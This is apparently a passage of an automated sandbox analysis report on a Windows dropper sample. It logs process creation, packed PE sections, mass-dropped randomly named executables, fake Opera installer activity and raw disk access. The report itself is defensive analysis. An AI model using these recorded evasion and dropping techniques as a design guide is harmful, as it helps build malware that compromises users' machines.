                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe Process created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe Process created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
                        Source: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe Process created: unknown unknown
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe Process created: unknown unknown
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe Process created: unknown unknown
                        Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Window found: window name: TMainForm
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: _assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb@ source: syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp
                        Source: Binary string: symbols\dll\System.Windows.Forms.pdb1 source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: `K_lib.dll.pdb source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003258000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: .pdb[ source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000D71000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: HC:\Windows\System.Windows.Forms.pdbZ source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: `K_lib.dll.pdb@+ source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003258000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: .exe.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: nss3.pdb source: syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp
                        Source: Binary string: indows.Forms.pdb source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: .exe.pdb@ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000D71000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp

                        Data Obfuscation

                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe Unpacked PE file: 16.2.weblinkanalyzer.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.short2:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Unpacked PE file: 17.2.syncUpd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe Unpacked PE file: 21.2.weblinkanalyzer.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.short2:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe Unpacked PE file: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe Unpacked PE file: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe Unpacked PE file: 16.2.weblinkanalyzer.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Unpacked PE file: 17.2.syncUpd.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe Unpacked PE file: 21.2.weblinkanalyzer.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe Unpacked PE file: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe Unpacked PE file: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack
                        Source: file.exe Static PE information: 0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004502C0
                        Source: SwLW7tCu3MPLSebktZR0Do4H.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: wGeagqqn2DOY11i8cqkdcJ6l.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: t6FVjUQyIYOEGsrhSQAlAtYA.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: LAuOzs2TVXyzss3wQ1slqfrw.exe.8.dr Static PE information: real checksum: 0x2db6f5 should be: 0x2d319a
                        Source: aRNQGQYPdgEPyk2wKE0Y2RBY.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: dvdyeMQ4IU05HT0hXUiampSM.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: NQMtpPx9qXPy8v0LlF2Kjrle.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: DdT3rCn1HYZaeiTB6islHQa6.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: 4ie4IrFHavveqFWO7SvVdq2i.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: 49zPHg8djprKbR3fbyK34TE8.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: u9uxsYMpS7D32QErsHuYUixB.exe.8.dr Static PE information: real checksum: 0x2db6f5 should be: 0x2d319a
                        Source: I6q6xa8OpNqFa1GE2NL68OxV.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: f3pOxPQt48GSFGTaAT61XRX4.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: tOekaWBMtMvKgKTpn1rNSApR.exe.8.dr Static PE information: real checksum: 0x2e02e9 should be: 0x2d7d8e
                        Source: sI7dZrzWguf80YTd4w1tJlxT.exe.8.dr Static PE information: real checksum: 0x2dd4d1 should be: 0x2d4f76
                        Source: lznQzS1TH9pXKZRxAqzqQkL6.exe.8.dr Static PE information: real checksum: 0x2dd4d1 should be: 0x2d4f76
                        Source: nGTzGa5UK9rAljUvktVMxS0i.exe.8.dr Static PE information: real checksum: 0x2dc062 should be: 0x2d3b07
                        Source: CpPXXcmjwTrziBJjEjzVBqIO.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: dJWgkx2NkzIq27ZmDKfJlJSb.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: 6Q8Wwld29CZNDuak3WcfH07i.exe.8.dr Static PE information: real checksum: 0x2db1f6 should be: 0x2e2c9a
                        Source: nNmaiuLbBvtjFhtSarVAt2ZV.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: yjgJ9nt4OTDWzyoY4NSDLOwM.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: Z7skxxTmXai6Pa9s6OHd8pTL.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: 6kncXrojwkHyPQnSTc2Nn28Z.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: CS3CADtKPwRlkcskf1l0OgKj.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: zpUboT49MR3eAuGylrU8kcsm.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: cBFvqvrl6uXFbTB4JYYj3iX2.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: RjS1Nhdf06REy5J9bfLmGhpU.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: w9kWzhn3BOumuqtEzmPZdJ7I.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: zCH6Ixp4hDhbc4JHLXEIat9x.exe.8.dr Static PE information: real checksum: 0x2db257 should be: 0x2e2cfb
                        Source: UpuXhVlAiE2lL81UfJ7rqxoG.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: xYgVykjMJXKeoDKuEBWTMXD2.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: IfzaP4WqQEdUcGlnXuUZNlcC.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: H07iGpAOLsi3Xl2Zht1ZcBjf.exe.8.dr Static PE information: real checksum: 0x2e20a9 should be: 0x2d9b4e
                        Source: OGlsLpt3IrpM6JOWnTsyCqhd.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: UMNq6JQCwcuFbKEJ00C7NaNb.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: wY4rC1FxrpCjj3T82kMrcxVU.exe.8.dr Static PE information: real checksum: 0x2e23e7 should be: 0x2d9e8c
                        Source: gd9bLSj4SZDYngCX7Y23gLEe.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: M6twW38X7sVJZxeigqyEpnb7.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: ZMwlUWMtiNLOgzHdIp3EVbeM.exe.8.dr Static PE information: real checksum: 0x2e02e9 should be: 0x2d7d8e
                        Source: HTdfKOlxDXLXF51uNbI6vixn.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: 79Szb4ZgprIQoh5kmp3Ht91W.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: Xm54wLBRTMA3iYcjiLbASkwx.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: qz6mIWczIdkFWvUoxRClMBD1.exe.8.dr Static PE information: real checksum: 0x2db257 should be: 0x2e2cfb
                        Source: WHjVEyd48wD2Vps4mOrN0xgt.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: RHfgbpolIV21eYBHVUExVm7m.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: D2g51ebrTdw2dcv4PFU8OjS1.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: NRQOltVD0acQXnzUvV0AHMDa.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: f1VJcAMWETqBCjZqFoktlvLX.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: Rt1fDJgieviHwJMnSI1q15oh.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: qEZDdAWnBbu94XDsWbevAW3Z.exe.8.dr Static PE information: real checksum: 0x2dc062 should be: 0x2d3b07
                        Source: 3Dkw4ZNwPrQyjD2TIlPKqqcu.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: NIrszCqD63mWfcibv0YdSwFl.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: pqTEuXs4oMBqF8pyFu5iVhTO.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: ocxqlsVNXtyLzp2zpxnsa8Mt.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: o9mWBH3W8d1Wz63VdcWUPlCt.exe.8.dr Static PE information: real checksum: 0x2db1f6 should be: 0x2e2c9a
                        Source: JmSupDwlA9Oqy8L5plKWP6Oj.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: Ydv77irsMwFsUh797bOnhxVa.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: cOpSW0Wlkj1ce9hBfVKYpMs8.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: 6mUOGmYOgu78GIQPbKV3WDdm.exe.8.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                        Source: 1IQ1OhLwzIr1htrixbUaD3zt.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x2190c2
                        Source: oqVEsHQBNrwNPHffhPILiRr1.exe.8.dr Static PE information: real checksum: 0x1eaa5 should be: 0x211390
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_004065C8 push 00406605h; ret 12_2_004065FD
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_004040B5 push eax; ret 12_2_004040F1
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_00408104 push ecx; mov dword ptr [esp], eax 12_2_00408109
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_00404185 push 00404391h; ret 12_2_00404389
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_00404206 push 00404391h; ret 12_2_00404389
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_0040C218 push eax; ret 12_2_0040C219
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_004042E8 push 00404391h; ret 12_2_00404389
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_00404283 push 00404391h; ret 12_2_00404389
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_00408F38 push 00408F6Bh; ret 12_2_00408F63
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0040994C push 00409989h; ret 14_2_00409981
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00483F88 push 00484096h; ret 14_2_0048408E
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004062B4 push ecx; mov dword ptr [esp], eax 14_2_004062B5
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004104E0 push ecx; mov dword ptr [esp], edx 14_2_004104E5
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00412928 push 0041298Bh; ret 14_2_00412983
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00494CAC push ecx; mov dword ptr [esp], ecx 14_2_00494CB1
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0040CE38 push ecx; mov dword ptr [esp], edx 14_2_0040CE3A
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004592D0 push 00459314h; ret 14_2_0045930C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0040F398 push ecx; mov dword ptr [esp], edx 14_2_0040F39A
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00443440 push ecx; mov dword ptr [esp], ecx 14_2_00443444
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0040546D push eax; ret 14_2_004054A9
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0040553D push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004055BE push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00485678 push ecx; mov dword ptr [esp], ecx 14_2_0048567D
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0040563B push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004056A0 push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004517F8 push 0045182Bh; ret 14_2_00451823
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004519BC push ecx; mov dword ptr [esp], eax14_2_004519C1
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00477B08 push ecx; mov dword ptr [esp], edx14_2_00477B09
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00419C28 push ecx; mov dword ptr [esp], ecx14_2_00419C2D
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045FD1C push ecx; mov dword ptr [esp], ecx14_2_0045FD20
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00499D30 pushad ; retf 14_2_00499D3F
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 | 16_2_00401A4F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\oUnpZjKgjJgNH93xPx2I8mpn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\Rt1fDJgieviHwJMnSI1q15oh.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_108.0.5067.24_Autoupdate_x64[1].exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\libogg-0.dll (copy)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\yjgJ9nt4OTDWzyoY4NSDLOwM.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\dT5XD26YPNzEYfrQcE2X8ih2.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\BXPlhyu5Y5wZKxacaQ0MJ8m7.exe
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027440668612.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\4Q81HIYmOK1SegnFxkPpwM9e.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\tQS97uWWtHJ2H92y7dke3VAE.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280932613620.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\2F22VRFSBNYWhRCIxmDEOfGG.exe
                        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210274997611284.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe
